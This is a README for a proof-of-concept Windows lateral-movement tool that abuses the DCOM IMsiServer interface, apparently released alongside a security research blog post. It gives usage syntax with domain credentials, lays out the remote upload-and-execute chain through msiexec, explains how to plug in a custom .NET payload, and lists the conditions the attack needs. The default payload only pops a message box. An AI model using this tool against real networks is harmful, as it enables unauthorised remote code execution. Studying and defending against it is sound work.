DCOM Lateral movement POC abusing the IMsiServer interface
https://www.deepinstinct.com/blog/forget-psexec-dcom-upload-execute-backdoor
The solution contains 2 projects
-
DCOMUploadExec - A C++ project which hosts the lateral movement attack code
-
AssemblyPayload - A .NET DLL that pops a MessageBox. It is the default payload DCOMUploadExec uses
Compile the solution
Usage: DCOMUploadExec.exe [domain]\[user]:[password]@[address]
Local Usage: DCOMUploadExec.exe LOCALHOST (Run this as administrator)
DCOMUploadExec.exe will:
-
Upload the default payload DLL, AssemblyPayload, to the remote PC
-
Load the DLL to a remote MSIEXEC.exe process
-
Execute an export from the DLL
-
Receive a result from the export
The payload must be a strong-named .NET assembly
PayloadConfig.h is used to configure the payload DCOMUploadExec will use.
It is defaulted to the output of AssemblyPayload.
In order to use a custom payload:
-
create a strong-named .NET assembly that exports a function named InitializeEmbeddedUI - this will be the function that DCOMUploadExec will eventually execute on the remote target
-
Fill your custom payload's details in PayloadConfig.h:
-
PAYLOAD_ASSEMBLY_PATH = // local path to your created payload
-
ASSEMBLY_NAME = // the assembly name
-
ASSEMBLY_BITNESS = // "64" for an x64 payload, "32" for x86 payload;
-
ASSEMBLY_VERSION = // the value from
sigcheck.exe -n PAYLOAD_ASSEMBLY_PATH -
ASSEMBLY_PUBLIC_KEY = // the value from
sn.exe -T PAYLOAD_ASSEMBLY_PATH
-
-
Compile DCOMUploadExec and use it
-
The attacker and victim machines must be in the same domain or forest.
-
The attacker and victim machines must be consistent with the DCOM Hardening patch - either with the patch applied on both systems or absent on both.
-
The assembly payload must have a strong-name.
-
The assembly payload must be either x86 or x64 (Can't be AnyCPU).